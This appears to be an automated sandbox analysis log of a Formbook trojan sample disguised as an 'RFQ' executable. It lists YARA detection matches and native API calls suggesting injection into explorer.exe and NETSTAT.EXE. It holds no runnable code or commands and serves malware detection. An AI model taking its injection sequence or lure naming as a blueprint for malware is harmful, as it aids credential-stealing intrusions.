          Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: RFQ 245801.exe PID: 6716, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: RFQ 245801.exe PID: 4280, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: NETSTAT.EXE PID: 7156, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: RFQ 245801.exe
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041A330 NtCreateFile,5_2_0041A330
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041A3E0 NtReadFile,5_2_0041A3E0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041A460 NtClose,5_2_0041A460
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041A510 NtAllocateVirtualMemory,5_2_0041A510
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041A2EA NtCreateFile,5_2_0041A2EA
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041A32A NtCreateFile,5_2_0041A32A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041A3DA NtReadFile,5_2_0041A3DA
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041A45E NtClose,5_2_0041A45E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041A50A NtAllocateVirtualMemory,5_2_0041A50A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762B60 NtClose,LdrInitializeThunk,5_2_01762B60
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_01762BF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762AD0 NtReadFile,LdrInitializeThunk,5_2_01762AD0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_01762D30
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762D10 NtMapViewOfSection,LdrInitializeThunk,5_2_01762D10
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01762DF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762DD0 NtDelayExecution,LdrInitializeThunk,5_2_01762DD0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01762C70
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_01762CA0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762F30 NtCreateSection,LdrInitializeThunk,5_2_01762F30
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762FE0 NtCreateFile,LdrInitializeThunk,5_2_01762FE0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762FB0 NtResumeThread,LdrInitializeThunk,5_2_01762FB0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762F90 NtProtectVirtualMemory,LdrInitializeThunk,5_2_01762F90
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_01762EA0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_01762E80
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01764340 NtSetContextThread,5_2_01764340
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01764650 NtSuspendThread,5_2_01764650
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762BE0 NtQueryValueKey,5_2_01762BE0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762BA0 NtEnumerateValueKey,5_2_01762BA0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762B80 NtQueryInformationFile,5_2_01762B80
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762AF0 NtWriteFile,5_2_01762AF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762AB0 NtWaitForSingleObject,5_2_01762AB0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762D00 NtSetInformationFile,5_2_01762D00
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762DB0 NtEnumerateKey,5_2_01762DB0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762C60 NtCreateKey,5_2_01762C60
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762C00 NtQueryInformationProcess,5_2_01762C00
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762CF0 NtOpenProcess,5_2_01762CF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762CC0 NtQueryVirtualMemory,5_2_01762CC0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762F60 NtCreateProcessEx,5_2_01762F60
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762FA0 NtQuerySection,5_2_01762FA0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762E30 NtWriteVirtualMemory,5_2_01762E30
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762EE0 NtQueueApcThread,5_2_01762EE0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01763010 NtOpenDirectoryObject,5_2_01763010
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01763090 NtSetValueKey,5_2_01763090
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017635C0 NtCreateMutant,5_2_017635C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017639B0 NtGetContextThread,5_2_017639B0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01763D70 NtOpenThread,5_2_01763D70
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01763D10 NtOpenProcessToken,5_2_01763D10
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBA8232 NtCreateFile,6_2_0FBA8232
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBA9E12 NtProtectVirtualMemory,6_2_0FBA9E12
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBA9E0A NtProtectVirtualMemory,6_2_0FBA9E0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112B60 NtClose,LdrInitializeThunk,7_2_03112B60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03112BF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03112BE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112AD0 NtReadFile,LdrInitializeThunk,7_2_03112AD0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112F30 NtCreateSection,LdrInitializeThunk,7_2_03112F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112FE0 NtCreateFile,LdrInitializeThunk,7_2_03112FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_03112EA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03112D10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112DD0 NtDelayExecution,LdrInitializeThunk,7_2_03112DD0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03112DF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03112C70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112C60 NtCreateKey,LdrInitializeThunk,7_2_03112C60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03112CA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031135C0 NtCreateMutant,LdrInitializeThunk,7_2_031135C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03114340 NtSetContextThread,7_2_03114340
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03114650 NtSuspendThread,7_2_03114650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112B80 NtQueryInformationFile,7_2_03112B80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112BA0 NtEnumerateValueKey,7_2_03112BA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112AB0 NtWaitForSingleObject,7_2_03112AB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112AF0 NtWriteFile,7_2_03112AF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112F60 NtCreateProcessEx,7_2_03112F60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112F90 NtProtectVirtualMemory,7_2_03112F90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112FB0 NtResumeThread,7_2_03112FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112FA0 NtQuerySection,7_2_03112FA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112E30 NtWriteVirtualMemory,7_2_03112E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112E80 NtReadVirtualMemory,7_2_03112E80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112EE0 NtQueueApcThread,7_2_03112EE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112D00 NtSetInformationFile,7_2_03112D00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112D30 NtUnmapViewOfSection,7_2_03112D30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112DB0 NtEnumerateKey,7_2_03112DB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112C00 NtQueryInformationProcess,7_2_03112C00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112CC0 NtQueryVirtualMemory,7_2_03112CC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112CF0 NtOpenProcess,7_2_03112CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03113010 NtOpenDirectoryObject,7_2_03113010
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03113090 NtSetValueKey,7_2_03113090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031139B0 NtGetContextThread,7_2_031139B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03113D10 NtOpenProcessToken,7_2_03113D10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03113D70 NtOpenThread,7_2_03113D70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA330 NtCreateFile,7_2_026BA330
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA3E0 NtReadFile,7_2_026BA3E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA460 NtClose,7_2_026BA460
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA510 NtAllocateVirtualMemory,7_2_026BA510
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA2EA NtCreateFile,7_2_026BA2EA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA32A NtCreateFile,7_2_026BA32A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA3DA NtReadFile,7_2_026BA3DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA45E NtClose,7_2_026BA45E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA50A NtAllocateVirtualMemory,7_2_026BA50A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EE9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,7_2_02EE9BAF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EEA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,7_2_02EEA036
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EE9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_02EE9BB2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EEA042 NtQueryInformationProcess,7_2_02EEA042
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 0_2_029EE8280_2_029EE828
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 0_2_0733AAF80_2_0733AAF8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 0_2_073326200_2_07332620
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 0_2_07332A580_2_07332A58
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 0_2_07332A480_2_07332A48
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 0_2_073341000_2_07334100
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 0_2_073321E80_2_073321E8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 0_2_073349D80_2_073349D8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 0_2_073349C70_2_073349C7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 0_2_073300060_2_07330006
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041D89D5_2_0041D89D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041DA885_2_0041DA88
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041DBA85_2_0041DBA8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00402D875_2_00402D87
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00409E5B5_2_00409E5B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00409E605_2_00409E60
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041DFD55_2_0041DFD5
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041E7925_2_0041E792
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B81585_2_017B8158
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CA1185_2_017CA118
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017201005_2_01720100
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E81CC5_2_017E81CC
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F01AA5_2_017F01AA
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E41A25_2_017E41A2
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C20005_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EA3525_2_017EA352
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E3F05_2_0173E3F0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F03E65_2_017F03E6
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D02745_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B02C05_2_017B02C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017305355_2_01730535
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F05915_2_017F0591
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E24465_2_017E2446
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D44205_2_017D4420
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017DE4F65_2_017DE4F6
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017307705_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017547505_2_01754750
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172C7C05_2_0172C7C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174C6E05_2_0174C6E0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017469625_2_01746962
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A05_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017FA9A65_2_017FA9A6
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173A8405_2_0173A840
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017328405_2_01732840
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E8F05_2_0175E8F0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017168B85_2_017168B8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EAB405_2_017EAB40
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E6BD75_2_017E6BD7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172EA805_2_0172EA80
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CCD1F5_2_017CCD1F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173AD005_2_0173AD00
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172ADE05_2_0172ADE0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01748DBF5_2_01748DBF
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730C005_2_01730C00
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720CF25_2_01720CF2
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0CB55_2_017D0CB5
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A4F405_2_017A4F40
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01750F305_2_01750F30
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D2F305_2_017D2F30
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01772F285_2_01772F28
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01722FC85_2_01722FC8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AEFA05_2_017AEFA0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730E595_2_01730E59
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EEE265_2_017EEE26
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EEEDB5_2_017EEEDB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742E905_2_01742E90
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017ECE935_2_017ECE93
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171F1725_2_0171F172
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017FB16B5_2_017FB16B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0176516C5_2_0176516C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173B1B05_2_0173B1B0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E70E95_2_017E70E9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EF0E05_2_017EF0E0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017DF0CC5_2_017DF0CC
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017370C05_2_017370C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171D34C5_2_0171D34C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E132D5_2_017E132D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0177739A5_2_0177739A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174D2F05_2_0174D2F0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D12ED5_2_017D12ED
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174B2C05_2_0174B2C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017352A05_2_017352A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E75715_2_017E7571
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F95C35_2_017F95C3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CD5B05_2_017CD5B0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017214605_2_01721460
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EF43F5_2_017EF43F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EF7B05_2_017EF7B0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017756305_2_01775630
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E16CC5_2_017E16CC
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017399505_2_01739950
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174B9505_2_0174B950
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C59105_2_017C5910
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179D8005_2_0179D800
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017338E05_2_017338E0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EFB765_2_017EFB76
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A5BF05_2_017A5BF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0176DBF95_2_0176DBF9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174FB805_2_0174FB80
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A3A6C5_2_017A3A6C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EFA495_2_017EFA49
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E7A465_2_017E7A46
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017DDAC65_2_017DDAC6
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CDAAC5_2_017CDAAC
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01775AA05_2_01775AA0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D1AA35_2_017D1AA3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E7D735_2_017E7D73
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E1D5A5_2_017E1D5A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01733D405_2_01733D40
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174FDC05_2_0174FDC0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A9C325_2_017A9C32
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EFCF25_2_017EFCF2
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EFF095_2_017EFF09
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_016F3FD55_2_016F3FD5
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_016F3FD25_2_016F3FD2
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EFFB15_2_017EFFB1
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01731F925_2_01731F92
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01739EB05_2_01739EB0
          Source: C:\Windows\explorer.exeCode function: 6_2_0F6F1B326_2_0F6F1B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0F6F1B306_2_0F6F1B30
          Source: C:\Windows\explorer.exeCode function: 6_2_0F6F72326_2_0F6F7232
          Source: C:\Windows\explorer.exeCode function: 6_2_0F6EED026_2_0F6EED02
          Source: C:\Windows\explorer.exeCode function: 6_2_0F6F49126_2_0F6F4912
          Source: C:\Windows\explorer.exeCode function: 6_2_0F6FA5CD6_2_0F6FA5CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0F6F60366_2_0F6F6036
          Source: C:\Windows\explorer.exeCode function: 6_2_0F6ED0826_2_0F6ED082
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBA82326_2_0FBA8232
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBAB5CD6_2_0FBAB5CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBA2B326_2_0FBA2B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBA2B306_2_0FBA2B30
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBA59126_2_0FBA5912
          Source: C:\Windows\explorer.exeCode function: 6_2_0FB9FD026_2_0FB9FD02
          Source: C:\Windows\explorer.exeCode function: 6_2_0FB9E0826_2_0FB9E082
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBA70366_2_0FBA7036
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_006421677_2_00642167
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_006417157_2_00641715
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319A3527_2_0319A352
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031A03E67_2_031A03E6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030EE3F07_2_030EE3F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031802747_2_03180274
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031602C07_2_031602C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030D01007_2_030D0100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0317A1187_2_0317A118
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031681587_2_03168158
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031A01AA7_2_031A01AA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031941A27_2_031941A2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031981CC7_2_031981CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031720007_2_03172000
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031047507_2_03104750
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E07707_2_030E0770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030DC7C07_2_030DC7C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030FC6E07_2_030FC6E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E05357_2_030E0535
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031A05917_2_031A0591
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031844207_2_03184420
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031924467_2_03192446
